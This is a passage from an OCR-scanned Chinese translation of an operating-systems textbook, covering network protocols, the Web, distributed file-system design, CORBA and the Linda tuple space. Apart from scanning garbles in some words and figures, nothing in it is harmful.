个 请 求 ， 而 服务 器 则 响应 该 请 求 。 图 8-30 总 结 了 上 面 讨论 过 的 各 种 服务 类 型 。 

2. 网 络 协 议 

所 有 网 络 都 有 高 度 专门 化 的 规则 ， 用 以 说 明 什 么 消息 可 以 发 送 以 及 如 何 响应 这 些 消 息 。 例 如 ， 在 某 
些 条 件 下 (如 文件 传送 )， 当 一 条 消息 从 源 送 到 目的 地 时 ， 目 的 地 被 要 求 返 回 一 个 确认 ， 以 表示 正确 收 到 
了 该 消息 。 在 其 他 情形 下 (如 数字 电话 )， 就 不 要 求 这 样 的 确认 。 用 于 特定 计算 机 通信 的 这 些 规则 的 集合 ， 
称 为 协议 (protocol) 。 有 许多 种 协议 ， 包 括 路 由 器 -路 由 器 协议 、 主 机 -主机 协议 以 及 其 他 协议 等 。 要 了 
解 计 算 机 网 络 及 其 协议 的 完整 论述 ， 可 参阅 《计算 机 网 络 (第 5 版 )》(《Computer Networks》， 
Tanenbaum 和 Wetherall，2010 ) 。 

所 有 的 现代 网 络 都 使 用 所 谓 的 协议 栈 (protocol stack) 把 不 同 的 协议 一 层 一 层 登 加 起 来 。 每 一 层 解 
决 不 同 的 问题 。 例 如 ， 处 于 最 低层 的 协议 会 定义 如 何 识别 比特 流 中 的 数据 包 的 起 始 和 结束 位 置 。 在 更 高 
一 层 上 ， 协 议会 确定 如 何 通 过 复杂 的 网 络 来 把 数据 包 从 来 源 节 点 发 送 到 目标 节点 。 再 高 一 层 上 ， 协 议会 
确保 多 包 消 息 中 的 所 有 数据 包 都 按照 合适 的 顺序 正确 到 达 。 

大 多 数 分 布 式 系统 都 使 用 Internet 作 为 基础 ， 因 此 这 些 系 统 使 用 的 关键 协议 是 两 种 主要 的 Internet 协 
议 : IP 和 TCP。IP (Internet Protocol) 是 一 种 数据 报 协议 ， 发 送 者 可 以 向 网 络 上 发 出 长 达 64KB 的 数据 报 ， 
并 期 望 它 能 够 到 达 。 它 并 不 提供 任何 保证 。 当 数据 报 在 网 络 上 传送 时 ， 它 可 能 被 切割 成 更 小 的 包 。 这 些 
包 独 立 进 行 传输 ， 并 可 能 通过 不 同 的 路 由 。 当 所 有 的 部 分 都 到 达 目 的 地 时 ， 再 把 它们 按照 正确 的 顺序 装 
配 起 来 并 提交 出 去 。 

当前 有 两 个 版 本 的 卫 在 使 用 ， 即 v4 和 v6。 当 前 v4 仍 然 占 有 支配 地 位 ， 所 以 我 们 这 里 主要 讨论 它 ， 但 
是 ，v6 是 未 来 的 发 展 方向 。 每 个 v4 包 以 一 个 40 字 节 的 包头 开始 ， 其 中 包含 32 位 源 地 址 和 32 位 目标 地 址 。 
这 些 地 址 就 称 为 IP 地 址 ， 它 们 构成 了 Internet 中 路 由 选择 的 基础 。 通 常 IP 地 址 写作 4 个 由 点 隔 开 的 十 进 制 
数 ， 每 个 数 介 于 0~255 之 间 ， 例 如 192.31.231.65。 当 一 个 包 到 达 路 由 器 时 ， 路 由 器 会 解析 出 IP 目 标 地 址 ， 
并 利用 该 地 址 选择 路 由 。 

既然 IP 数 据 报 是 非 应 答 的 , 所 以 对 于 Internet 的 可 靠 通信 仅仅 使 用 IP 是 不 够 的 。 为 了 提供 可 靠 的 通信 ， 
通常 在 IP 层 之 上 使 用 另 一 种 协议 ，TCP (Transmission Control Protocol， 传 输 控 制 协 议 )。TCP 使 用 IP 来 
提供 面向 连接 的 数据 流 。 为 了 使 用 TCP， 进 程 需要 首先 与 一 个 远程 进程 建立 连接 。 被 请 求 的 进程 需要 通 
过 机 器 的 下 地 址 和 机 器 的 端口 号 来 指定 ,而 对 进入 的 连接 感 兴趣 的 进程 监听 该 端口 。 这 些 工 作 完 成 之 后 ， 
只 需 把 字 节 流放 入 连接 ， 那 么 就 能 保证 它们 会 从 另 一 端 按 照 正确 的 顺序 完好 无 损 地 出 来 。TCP 的 实现 是 
通过 序列 号 、 校 检 和 、 出 错 重 传 来 提供 这 种 保证 的 。 所 有 这 些 对 于 发 送 者 和 接收 者 进程 都 是 透明 的 。 它 
们 看 到 的 只 是 可 靠 的 进程 间 通 信 ， 就 像 UNIX 管 道 一 样 。 

为 了 了 解 这 些 协议 的 交互 过 程 ， 我 们 来 考虑 一 种 最 简单 的 情况 : 要 发 送 的 消息 很 小 ， 在 任何 一 层 都 
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REEDA., ERATE Fl Internet LyEthernet+}, PARBRA StHtAle? 首先 ， 用 户 进程 
产生 消息 ， 并 在 一 个 事先 建立 好 的 TCP 连 接 上 通过 系统 调用 来 发 送 消息 。 内 核 协议 栈 依 次 在 消息 前 面 添 
加 TCP 包 头 和 IP 包 头 。 然 后 由 Ethernet 驱 动 再 添加 一 个 Ethernet 包 头 ， 并 把 该 数据 包 发 送 到 Ethernet 的 路 由 
器 上 。 如 图 8-31 路 由 器 把 数据 包 发 送 到 Internet 上 。 





图 8-31 数据 包头 的 累加 过 程 


为 了 与 远程 机 器 建立 连接 (或 者 仅仅 是 给 它 发 送 一 个 数据 包 ) ， 需 要 知道 它 的 了 地 址 。 因 为 对 于 人 
们 来 说 管理 32 位 的 IP 地 址 列表 是 很 不 方便 的 ， 所 以 就 产生 了 一 种 称 为 DNS (Domain Name System， 域 名 
系统 ) 的 方案 ， 它 作为 一 个 数据 库 把 主机 的 ASCII 名 称 映射 为 对 应 的 IP 地 址 。 因 此 就 可 以 用 DNS 名 称 
(如 star.cs.vu.n1) 来 代替 对 应 的 卫 地 址 (如 130.37.24.6) 。 由 于 Internet 电 子 邮 件 地 址 采用 “用 户 名 @DNS 
主机 名 ”的 形式 命名 ， 所 以 DNS 名 称 广为人知 。 该 命名 系统 允许 发 送 方 机 器 上 的 邮件 程序 在 DNS 数据 库 
中 查找 目标 机 器 的 IP 地 址 ， 并 与 目标 机 上 的 邮件 守护 进程 建立 TCP 连 接 ， 然 后 把 邮件 作为 文件 发 送出 去 。 
用 户 名 一 并 发 送 ， 用 于 确定 存放 消息 的 邮箱 。 


8.3.3 基于 文档 的 中 间 件 

现在 我 们 已 经 有 了 一 些 有 关 网 络 和 协议 的 背景 知识 ， 可 以 开始 讨论 不 同 的 中 间 件 层 了 。 这 些 中 间 件 
层 位 于 基础 网 络 上 , 为 应 用 程序 和 用 户 提供 一 致 的 范 型 。 我 们 将 从 一 个 简单 但 是 却 非 常 著名 的 例子 开始 : 
万 维 网 (World Wide Web ) 。Web 是 由 在 欧洲 核子 中 心 (CERN) 工作 的 Tim Berners-Lee 于 1989 年 发 明 的 ， 
从 那 以 后 Web 就 像 野 火 一 样 传 遍 了 全 世界 。 

Web 背 后 的 原始 范 型 是 非常 简单 的 : 每 个 计算 机 可 以 持 有 一 个 或 多 个 文档 ， 称 为 Web 页 面 (Web 
page) 。 在 每 个 页 面 中 有 文本 、 图 像 、 图 标 、 声 音 、 电 影 等 ， 还 有 到 其 他 页 面 的 超 链接 (hyperlink) ( 指 
针 )。 当 用 户 使 用 一 个 称 为 Web 浏 览 器 (Web browser) 的 程序 请 求 一 个 Web 页 面 时 ， 该 页 面 就 显示 在 用 
户 的 屏幕 上 。 点 击 一 个 超 链 接 会 使 得 屏幕 上 的 当前 页 面 被 所 指向 的 页 面 替 代 。 尽 管 近来 在 Web 上 添加 了 
许多 的 花哨 名 堂 ， 但 是 其 底层 的 范 型 仍旧 很 清楚 地 存在 着 : Web 是 一 个 由 文档 构成 的 巨大 有 向 图 ， 其 中 
文档 可 以 指向 其 他 的 文档 ， 如 图 8-32 所 示 。 





图 8-32 Web 是 一 个 由 文档 构成 的 大 有 向 图 
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每 个 Web 页面 都 有 一 个 唯一 的 地 址 ， 称 为 URL (统一 资源 定位 符 ，Uniform Resource Locator), 其 
形式 为 protocol://DNS-name/file-name。http 协 议 ( 超 文 本 传输 协议 ，HyperText Transfer Protocol) 是 最 
常用 的 ， 不 过 ftp 和 其 他 协议 也 在 使 用 。 协 议 名 后 面 是 拥有 该 文件 的 主机 的 DNS 名 称 。 最 后 是 一 个 本 地 文 
件 名 ， 用 来 说 明 需 要 使 用 哪个 文件 。 因 此 ，URL 唯 一 指定 一 个 单个 文件 。 

整个 系统 按 如 下 方式 结合 在 一 起 : Web 根 本 上 是 一 个 客户 机 一 服务 器 系统 ， 用 户 是 客户 端 ， 而 Web 
站 点 则 是 服务 器 。 当 用 户 给 浏览 器 提供 一 个 URL 时 (或 者 键入 URL, 或 者 点 击 当前 页 面 上 的 某 个 超 链 接 )， 
浏览 器 则 按照 一 定 的 步骤 调 取 所 请 求 的 Web 页 面 。 作 为 一 个 例子 ,假设 提供 的 URL 是 http://www. 
minix3. org/getting-started/index.html。 浏 览 器 按照 下 面 的 步骤 取得 所 需 的 页 面 。 

1) 浏览 器 向 DNS 询问 www.minix3.org 的 卫 地 址 。 

2) DNS 的 回答 是 66.147.238.215 。 

3) 浏览 器 建立 一 个 到 66.147.238.215 上 端口 80 的 TCP 连 接 。 

4) 接着 浏览 器 发 送 对 文件 getting-started/index.html 的 请 求 。 

5) www.acm.org 服 务 器 发 送 文 件 getting-started/index.html。 

6) 浏览 器 显示 getting-started/index.html 文 件 中 的 所 有 内 容 。 

7) 同时 ， 浏 览 器 获取 并 显示 页 面 中 的 所 有 图 像 。 

8) 释放 TCP 连 接 。 

大 体 上 ， 这 就 是 web 的 基础 以 及 它 是 如 何 工作 的 。 许 多 其 他 的 功能 已 经 添加 在 了 上 述 基 本 Web 功 能 
ZET, 包括 样式 表 、 可 以 在 运行 中 生成 的 动态 网 页 、 带 有 可 在 客户 机 上 执行 的 小 程序 或 脚本 的 页 面 等 ， 
不 过 对 它们 的 讨论 超出 了 本 书 的 范围 。 


8.3.4 基于 文件 系统 的 中 间 件 

隐藏 在 Web 背 后 的 基本 思想 是 ， 使 一 个 分 布 式 系统 看 起 来 像 一 个 巨大 的 、 超 链接 的 集合 。 另 一 种 处 
理 方式 则 是 使 一 个 分 布 式 系统 看 起 来 像 一 个 大 型 文件 系统 。 在 这 一 节 中 ， 我 们 将 考察 一 些 与 设计 一 个 广 
域 文 件 系 统 有 关 的 问题 。 

分 布 式 系统 采用 一 个 文件 系统 模型 意味 着 只 存在 一 个 全 局 文件 系统 ， 全 世界 的 用 户 都 能 够 读 写 他 们 
各 自 具 有 授权 的 文件 。 通 过 一 个 进程 将 数据 写 人 文件 而 另 一 个 进程 把 数据 读 出 的 办 法 可 以 实现 通信 。 由 
此 产生 了 标准 文件 系统 中 的 许多 问题 , -但 是 也 有 一 些 与 分 布 性 相关 的 新 问题 。 

1. 传输 模式 

第 一 个 问题 是 ， 在 上 传 /下 载 模式 (upload/download model) 和 远程 访问 模式 之 间 的 选择 问题 。 在 
前 一 种 模式 中 ， 如 图 8-33a 所 示 ， 通 过 把 远程 服务 器 上 的 文件 复制 到 本 地 的 方法 ， 实 现 进程 对 远程 文件 
的 访问 。 如 果 只 是 需要 读 该 文件 ， 考 虑 到 高 性 能 的 需要 ， 就 在 本 地 读 出 该 文件 。 如 果 需 要 写 入 该 文件 ， 
就 在 本 地 写 人 。 进 程 完成 工作 之 后 ， 把 更 新 后 的 文件 送 回 原来 的 服务 器 。 在 远程 访问 模式 中 ， 文 件 停留 
在 服务 器 上 ， 而 客户 机 向 服务 器 发 出 命令 并 在 服务 器 上 完成 工作 ， 如 图 8-33b 所 示 。 





1. 客户 机 取 文 件 
客户 机 服务 器 旧 文 件 客户 机 服务 器 
新 文件 _ 请 求 mm 
\ 应 答 
3. PRLS 
2 访问 在 客户。 ae gone 文件 留 在 
机 上 完成 送 回 给 服务 器 服务 器 上 


a) b) 
图 8-33 a) 上 传 /下 载 模式 ，b) 远程 访问 模式 


上 传 /下 载 模式 的 优点 是 简单 ， 而 且 一 次 性 传送 整个 文件 的 方法 比 用 小 块 传送 文件 的 方法 效率 更 高 。 
其 缺点 是 为 了 在 本 地 存放 整个 文件 ， 必 须 拥 有 足够 的 空间 ， 即 使 只 需要 文件 的 一 部 分 也 要 移动 整个 文件 ， 
这 样 做 显然 是 一 种 浪费 ， 而 且 如 果 有 多 个 并 发 用 户 则 会 产生 一 致 性 问题 。 
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2. 目录 层次 

文件 只 是 所 涉及 的 问题 中 的 一 部 分 。 另 一 部 分 问题 是 目录 系统 。 所 有 的 分 布 式 系统 都 支持 有 多 个 文 
件 的 目录 。 接 下 来 的 设计 问题 是 ， 是 否 所 有 的 用 户 都 拥有 该 目录 层次 的 相同 视图 。 图 8-34 中 的 例子 正好 
表达 了 我 们 的 意思 。 在 图 8-34a 中 有 两 个 文件 服务 器 ， 每 个 服务 器 有 三 个 目录 和 一 些 文件 。 在 图 8-34b 中 
有 一 个 系统 ， 其 中 所 有 的 客户 (以 及 其 他 机 器 ) 对 该 分 布 式 文件 系统 拥有 相同 的 视图 。 如 果 在 某 台 机 器 
上 路 径 /D/E/x 是 有 效 的 ， 则 该 路 径 对 所 有 其 他 的 客户 也 是 有 效 的 。 

相反 ， 在 图 8-34c 中 ， 不同 的 机 器 有 该 文件 系统 的 不 同 视图 。 重 复 先 前 的 例子 ， 路 径 /D/E/x 可 能 在 客 
户 机 1 上 有 效 ， 但 是 在 客户 机 2 上 无 效 。 在 通过 远程 安装 方式 管理 多 个 文件 服务 器 的 系统 中 ， 图 8-34c 是 
一 个 典型 示例 。 这 样 既 灵 活 又 可 直接 实现 ， 但 是 其 缺点 是 ， 不 能 使 得 整个 系统 行为 像 单 一 的 、 旧 式 分 时 
系统 。 在 分 时 系统 中 ， 文 件 系 统 对 任何 进程 都 是 一 样 的 ， 如 图 8-34b 中 的 模型 。 这 个 属性 显然 使 得 系统 
容易 编程 和 理解 。 

一 个 密切 相关 的 问题 是 ， 是 否 存在 一 个 所 有 的 机 器 都 承认 的 全 局 根 目 录 。 获 得 全 局 根 目录 的 一 个 方 
法 是 ， 让 每 个 服务 器 的 根 目 录 只 包含 一 个 目录 项 。 在 这 种 情况 下 ， 路 径 取 /server/path 的 形式 ， 这 种 方 
式 有 其 缺点 ， 但 是 至 少 做 到 了 在 系统 中 处 处 相同 。 


文件 服务 器 1 客户 机 1 





a) b) 


图 8-34 a) 两 个 文件 服务 器 。 和 矩形 代表 目录 ， 贺 圈 代 表 文件 ; b) 所 有 客户 机 都 有 相同 文件 系统 视图 的 系 
统 ，c) 不 同 的 客户 机 可 能 会 有 不 同文 件 系统 视图 的 系统 


3. 命名 透明 性 

这 种 命名 方式 的 主要 问题 是 ， 它 不 是 完全 透明 的 。 这 里 涉及 两 种 类 型 的 透明 性 (transparency) ， 并 
且 有 必要 加 以 区 分 。 第 一 种 ， 位 置 透 明 性 (location transparency)， 其 含义 是 路 径 名 没有 隐 含 文件 所 在 位 
置 的 信息 。 类 似 于 /serverl/dirl/dir2/x 的 路 径 告诉 每 个 人 ，x 是 在 服务 器 1 上 ， 但 是 并 没有 说 明 该 服务 器 在 
哪里 。 在 网 络 中 该 服务 器 可 以 随意 移动 ， 而 该 路 径 名 却 不 必 改 动 。 所 以 这 个 系统 具有 位 置 透明 性 。 

但 是 ， 假 设 文件 非常 大 而 在 服务 器 1 上 的 空间 又 很 紧张 。 进 而 ， 如 果 在 服务 器 2 上 有 大 量 的 空间 ， 
那么 系统 也 许 会 自动 地 将 x 从 1 移 到 服务 器 2 上 。 不 幸 地 ， 当 整个 路 径 名 的 第 一 个 分 量 是 服务 器 时 ， 即 使 
dirl 和 dir2 在 两 个 服务 器 上 都 存在 ， 系 统 也 不 能 将 文件 自动 地 移动 到 其 他 的 服务 器 上 。 问 题 在 于 ， 让 文 
件 自动 移动 就 得 将 其 路 径 名 从 /serverl/dirl/dir2/x 变 为 /server2/dirl/dir2/x 。 如 果 路 径 改 变 了 ， 那 么 在 内 
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部 拥有 前 一 个 路 径 字 符 串 的 程序 就 会 停止 工作 。 如 果 在 一 个 系统 中 文件 移动 时 文件 的 名 称 不 会 随 之 改变 ， 
则 称 为 具有 位 置 独立 性 (location independence) 。 将 机 器 或 服务 器 名 称 嵌 在 路 径 名 中 的 分 布 式 系统 显然 
不 具有 位 置 独立 性 。 一 个 基于 远程 安装 (HR) 的 系统 当然 也 不 具有 位 置 独立 性 ， 因 为 在 把 某 个 文件 从 
一 个 文件 组 (安装 单元 ) 移 到 另 一 个 文件 组 时 ， 是 不 可 能 仍旧 使 用 原来 的 路 径 名 的 。 可 见 位 置 独立 性 是 
不 容易 实现 的 ， 但 它 是 分 布 式 系统 所 期 望 的 一 个 属性 。 

这 里 把 前 面 讨 论 过 的 内 容 加 以 简要 的 总 结 ， 在 分 布 式 系统 中 处 理 文件 和 目录 命名 的 方式 通常 有 以 下 三 种 : 

1) 机 器 + 路 径 名 ， 如 /machine/path 或 machine:path, 

2) 将 远程 文件 系统 安装 在 本 地 文件 层次 中 。 

3) 在 所 有 的 机 器 上 看 来 都 相同 的 单一 名 字 空 间 。 
前 两 种 方式 很 容易 实现 , 特别 是 作为 将 原本 不 是 为 分 布 式 应 用 而 设计 的 已 有 系统 连接 起 来 的 方式 时 是 这 样 。 
而 第 三 种 方式 的 实现 则 是 困难 的 ， 并 且 需 要 仔细 的 设计 ， 但 是 它 能 够 减轻 了 程序 员 和 用 户 的 负担 。 

4. 文件 共享 的 语义 

当 两 个 或 多 个 用 户 共享 同一 个 文件 时 ， 为 了 避免 出 现 问题 有 必要 精确 地 定义 读 和 写 的 语义 。 在 单 处 
理 器 系统 中 ， 通 常 ， 语 义 是 如 下 表述 的 ， 在 一 个 read 系 统 调用 跟随 一 个 write 系统 调用 时 ， 则 read 返 回 
刚才 写 入 的 值 ， 如 图 8-35a 所 示 。 类 似 地 ， 当 两 个 write 连续 出 现 ， 后 跟随 一 个 read 时 ， 则 读 出 的 值 是 后 
一 个 写 操作 所 存 和 的 值 。 实 际 上 ， 系 统 强制 所 有 的 系统 调用 有 序 ， 并 且 所 有 的 处 理 器 都 看 到 同样 的 顺序 。 
我 们 将 这 种 模型 称 为 顺序 一 致 性 (sequential consistency) 。 

在 分 布 式 系统 中 ， 只 要 只 有 一 个 文件 服务 器 而 且 客户 机 不 缓存 文件 ， 那 么 顺序 一 致 性 是 很 容易 实现 
的 。 所 有 的 read 和 write 直接 发 送 到 这 个 文件 服务 器 上 ， 而 该 服务 器 严格 地 按 顺 序 执行 它 们 。 

不 过 ， 实 际 情况 中 ， 如 果 所 有 的 文件 请 求 都 必须 送 到 单 台 文件 服务 器 上 处 理 ， 那 么 这 个 分 布 式 系统 
的 性 能 往往 会 很 精 糕 。 这 个 问题 可 以 用 如 下 方式 来 解决 ， 即 让 客户 机 在 其 私有 的 高 速 缓存 中 保留 经 常 使 
用 文件 的 本 地 副本 。 但 是 ， 如 果 客 户 机 1 修改 了 在 本 地 高 速 缓存 中 的 文件 ， 而 紧 接 着 客户 机 2 从 服务 器 上 
读 取 访 文件， 那么 客户 机 2 就 会 得 到 一 个 已 经 过 时 的 文件 ， 如 图 8-35b 所 示 。 


客户 机 1 





单 处 理 器 2. BA “e” 1. 读 入 “ab” 
LBAS 原始 
at 文件 服务 器 
[alble| 
2. 读 取 “abc” 


b) 
图 8-35 a) 顺序 一 致 性 ，b) 在 一 个 带 有 高 速 缓存 的 分 布 式 系统 中 ， 读 文件 可 能 会 返回 一 个 废弃 的 值 
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走出 这 个 困 局 的 一 个 途径 是 ， 将 高 速 缓存 文件 上 的 改动 立即 传送 回 服务 器 。 尽 管 概念 上 很 简单 ， 但 
这 个 方法 却 是 低 效率 的 。 另 一 个 解决 方案 是 放宽 文件 共享 的 语义 。 一 般 的 语义 要 求 一 个 读 操作 要 看 到 其 
之 前 的 所 有 写 操 作 的 效果 ， 我 们 可 以 定义 一 条 新 规则 来 取代 它 :“ 在 一 个 打开 文件 上 所 进行 的 修改 ， 最 
初 仅 对 进行 这 些 修改 的 进程 是 可 见 的 。 只 有 在 该 文件 关闭 之 后 ， 这 些 修改 才 对 其 他 进程 可 见 。” 采 用 这 
样 一 个 规则 不 会 改变 在 图 8-35b 中 发 生 的 事件 ， 但 是 这 条 规则 确实 重新 定义 了 所 谓 正确 的 具体 操作 行为 
(B 得 到 了 文件 的 原始 值 ) 。 当 客户 机 1 关闭 文件 时 ， 它 将 一 个 副本 回 送 给 服务 器 ， 因 此 ， 正 如 所 期 望 的 ， 
后 续 的 read 操 作 得 到 了 新 的 值 。 实 际 上 ， 这 个 规则 就 是 如 图 8-33 所 示 的 上 传 /下 载 模式 。 这 种 语义 已 经 得 
到 广泛 的 实现 ， 即 所 谓 的 会 话语 义 (session semantic), 

使 用 会 话语 义 产生 了 新 的 问题 ， 即 如 果 两 个 或 更 多 的 客户 机 同时 缓存 并 修改 同一 个 文件 ， 应 该 怎么 
办 ? 一 个 解决 方案 是 ， 当 每 个 文件 依次 关闭 时 ， 其 值 会 被 送 回 给 服务 器 ， 所 以 最 后 的 结果 取决 于 哪个 文 
件 最 后 关闭 。 一 个 不 太 令 人 满意 的 、 但 是 较 容易 实现 的 替代 方案 是 ， 最 后 的 结果 是 在 各 种 候选 中 选择 一 
个 ,但 并 不 指定 是 哪 一 个 。 

对 会 话语 义 的 另 一 种 处 理 方式 是 ， 使 用 上 传 /下 载 模式 ， 但 是 自动 对 已 经 下 载 的 文件 加 锁 。 其 他 试 
图 下 载 该 文件 的 客户 机 将 被 挂 起 直到 第 一 个 客户 机 返回 。 如 果 对 某 个 文件 的 操作 要 求 非常 多 ， 服 务 器 可 
以 向 持 有 该 文件 的 客户 机 发 送 消 息 ， 询 问 是 否 可 以 加 快速 度 ， 不 过 这 样 做 可 能 没有 作用 。 总 而 言 之, E 
确 地 实现 共享 文件 的 语义 是 一 件 棘手 的 事情 ， 并 不 存在 一 个 优雅 和 有 效 的 解决 方案 。 


8.3.5 基于 对 象 的 中 间 件 

现在 让 我 们 考察 第 三 种 范 型 。 这 里 不 再 说 一 切 都 是 文档 或 者 一 切 都 是 文件 ， 取 而 代 之 ， 我 们 会 说 一 
切 都 是 对 象 。 对 象 是 变量 的 集合 ， 这 些 变量 与 一 套 称 为 方法 的 访问 过 程 绑 定 在 一 起 。 进 程 不 允许 直接 访 
问 这 些 变量 。 相 反 ， 要 求 它们 调用 方法 来 访问 。 

有 一 些 程序 设计 语言 ， 如 C++ 和 Java， 是 面向 对 象 的 ， 但 这 些 对 象 是 语言 级 的 对 象 ， 而 不 是 运行 时 
刻 的 对 象 。 一 个 知名 的 基于 运行 时 对 象 的 系统 是 CORBA (公共 对 象 请 求 代理 体系 结构 ，Common 
Object Request Broker Architecture; Vinoski，1997)。CORBA 是 一 个 客户 机 一 服务 器 系统 ， 其 中 在 客户 
机 上 的 客户 进程 可 以 调用 位 于 (可 能 是 远程 ) 服务 器 上 的 对 象 操作 。CORBA 是 为 运行 不 同 硬件 平台 和 
操作 系统 的 异 构 系统 而 设计 的 ， 并 且 用 各 种 语言 编写 。 为 了 使 在 一 个 平台 上 的 客户 有 可 能 使 用 在 不 同 平 
台 上 的 服务 器 ， 将 ORB (对 象 请 求 代理 ，Object Request Broker) 插入 到 客户 机 和 服务 器 之 间 ， 从 而 使 
它们 相互 匹配 。ORB 在 CORBA 中 扮演 着 重要 的 角色 ， 以 至 于 连 该 系统 也 采用 了 这 个 名 称 。 

每 个 CORBA 对 象 是 由 叫 作 IDL (接口 定义 语言 ，Interface Definition Language) 的 语言 中 的 接口 定 
义 所 定义 的 ， 说 明 该 对 象 提供 什么 方法 ， 以 及 每 个 方法 期 望 使 用 什么 类 型 的 参数 。 可 以 把 IDL 的 规约 
(specification) 编译 进 客户 端 存 根 过 程 中 ， 并 且 存 储 在 一 个 库 里 。 如 果 一 个 客户 机 进程 预先 知道 它 需要 
访问 某 个 对 象 ， 这 个 进程 则 与 该 对 象 的 客户 端 存根 代码 链接 。 也 可 以 把 IDL 规 约 编译 进 服务 器 一 方 的 一 
个 框架 (skeleton) 过 程 中 。 如 果 不 能 提前 知道 进程 需要 使 用 哪 一 个 CORBA 对 象 ， 进 行动 态 调用 也 是 可 
能 的 ， 但 是 有 关 动 态 调 用 如 何 工作 的 原理 则 不 在 本 书 的 讲述 范围 内 。 

当 创 建 一 个 CORBA 对 象 时 ， 一 个 对 它 的 引用 也 创建 出 来 并 返回 给 创建 它 的 进程 。 该 引用 涉及 进程 如 
何 标识 该 对 象 以 便 随 后 对 其 方法 进行 调用 。 该 引用 还 可 以 传递 给 其 他 的 进程 或 存储 在 一 个 对 象 目录 中 。 

要 调用 一 个 对 象 中 的 方法 ， 客 户 机 进程 必须 首先 获得 对 该 对 象 的 引用 。 引 用 可 以 直接 来 源 于 创建 进 
程 ， 或 更 有 可 能 是 ， 通 过 名 字 寻 找 或 通过 功能 在 某 类 目录 中 寻找 。 一 旦 有 了 该 对 象 的 引用 ， 客 户 机 进程 
将 把 方法 调用 的 参数 编排 进 一 个 便利 的 结构 中 ， 然 后 与 客户 机 ORB 联 系 。 接 着 ， 客 户 机 ORB 向 服务 器 
ORB 发 送 一 条 消息 ， 后 者 真正 调用 对 象 中 的 方法 。 整 个 机 制 类 似 于 RPC。 

ORB 的 功能 是 将 客户 机 和 服务 器 代码 中 的 所 有 低层 次 的 分 布 和 通信 细节 都 隐藏 起 来 。 特 别 地 ， 客 户 
机 的 ORB 隐 藏 了 服务 器 的 位 置 、 服 务 器 是 二 进 制 代 码 还 是 脚本 、 服 务 器 在 什么 硬件 和 操作 系统 上 运行 、 
有 关 对 象 当前 是 否 是 活动 的 以 及 两 个 ORB 是 如 何 通信 的 (例如 ，TCP/IP、RPC、 共 享 内 存 等 )。 

在 第 一 版 CORBA 中 ， 没 有 规定 客户 机 ORB 和 服务 器 ORB 之 间 的 协议 。 结 果 导 致 每 一 个 ORB 的 销售 
商都 使 用 不 同 的 协议 ， 其 中 的 任何 两 个 协议 之 间 都 不 能 彼此 通信 。 在 2.0 版 中 ， 规 定 了 协议 。 对 于 用 在 
Internet 上 的 通信 ， 协 议 称 为 IIOP (Internet InterOrb Protocol) 。 
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“为 了 能 够 在 CORBA 系 统 中 使 用 那些 不 是 为 CORBA 编 写 的 对 象 ， 可 以 为 每 个 对 象 装备 一 个 对 象 适 配 
器 (object adapter) 。 对 象 适配器 是 一 种 包装 器 ， 它 处 理 诸如 登记 对 象 、 生 成 对 象 引用 以 及 激发 一 个 在 
被 调用 时 处 于 未 活动 状态 的 对 象 等 琐碎 事务 。 所 有 这 些 与 CORBA 有 关 部 分 的 布局 如 图 8-36 所 示 。 


客户 机 客户 机 存根 ER, 服务 器 








图 8-36 基于 CORBA 的 分 布 式 系统 中 的 主要 元 素 (CORBA 部 件 由 灰色 表示 ) 


对 于 CORBA 而 言 ， 一 个 严重 问题 是 每 个 CORBA 对 象 只 存在 一 个 服务 器 上 ， 这 意味 着 那些 在 世界 各 
地 客户 机 上 被 大 量 使 用 的 对 象 ， 会 有 很 差 的 性 能 。 在 实践 中 ，CORBA 只 在 小 规模 系统 中 才能 有 效 工作 ， 
比如 ， 在 一 台 计 算 机 、 一 个 局 域 网 或 者 一 个 公司 中 用 来 连接 进程 。 


8.3.6 基于 协作 的 中 间 件 

分 布 式 系统 的 最 后 一 个 范 型 是 所 谓 基 于 协作 的 中 间 件 (coordination-based middleware) 。 我 们 将 从 
讨论 Linda 系 统 开 始 ， 这 是 一 个 开启 了 该 领域 的 学 术 性 研究 项 目 。 

1. Linda 

Linda 是 一 个 由 耶鲁 大 学 的 David Gelernter 和 他 的 学 生 Nick Carriero (Carriero 与 Gelernter , 1986; 
Carriero 与 Gelernter，1985) 研发 的 用 于 通信 和 同步 的 新 系统 。 在 Linda 系 统 中 ， 相 互 独立 的 进程 之 间 通 过 
一 个 抽象 的 元 组 空间 (tuple space) 进行 通信 。 对 整个 系统 而 言 ， 元 组 空间 是 全 局 性 的 ， 在 任何 机 器 上 的 
进程 都 可 以 把 元 组 插入 或 移出 元 组 空间 ， 而 不 用 考虑 它们 是 如 何 存放 的 以 及 存放 在 何 处 。 对 于 用 户 而 言 ， 
元 组 空间 像 一 个 巨大 的 全 局 共享 存储 器 ， 如 同 我 们 前 面 已 经 看 到 的 ( 见 图 8-21c) 各 种 类 似 的 形式 。 

一 个 元 组 类 似 于 C 语 言 或 者 Java 中 的 结构 。 它 包括 一 个 或 多 个 域 ， 每 个 域 是 一 个 由 基 语 言 (base 
language) (通过 在 已 有 的 语言 ， 如 C 语 言 中 添加 一 个 库 ， 可 以 实现 Linda) 所 支持 的 某 种 类 型 的 值 。 对 
于 C-Linda， 域 的 类 型 包括 整数 、 长 整数 、 浮 点 数 以 及 诸如 数 Tabo", 2,5) 

组 (包括 字符 串 ) 和 结构 (但 是 不 含有 其 他 的 元 组 ) 之 类 的 | (ematrix-1", 1,6, 3.14) 
组 合 类 型 。 与 对 象 不 同 ， 元 组 是 纯粹 的 数据 ， 它 们 设 有 任何 ("family", "is-sister", "Stephany", "Roberta") 
相关 联 的 方法 。 在 图 8-37 中 给 出 了 三 个 元 组 的 示例 。 

在 元 组 上 存在 四 种 操作 。 第 一 种 out， 将 一 个 元 组 放 入 元 
组 空间 中 。 例 如 ， 

out("abc", 2, 5); 

该 操作 将 元 组 ("abc", 2, 5) 放 入 到 元 组 空间 中 。onut 的 域 通常 是 常数 、 变 量 或 者 是 表达 式 ， 例 如 

out("matrix-1",i, j, 3.14); 
输出 一 个 带 有 四 个 域 的 元 组 ， 其 中 的 第 二 个 域 和 第 三 个 域 由 变量 ;nj 的 当前 值 所 决定 。 

”通过 使 用 in 原 语 可 以 从 元 组 空间 中 获取 元 组 。 该 原 语 通过 内 容 而 不 是 名 称 或 者 地 址 寻找 元 组 。in 的 
域 可 以 是 表达 式 或 者 形式 参数 。 例 如 ， 考 虑 

in("abc", 2,7); 

这 个 操作 在 元 组 空间 中 “查询 ”包含 字符 串 “abc”、 整 数 2 以 及 在 第 三 个 域 中 含有 任意 整数 (假设 是 整 
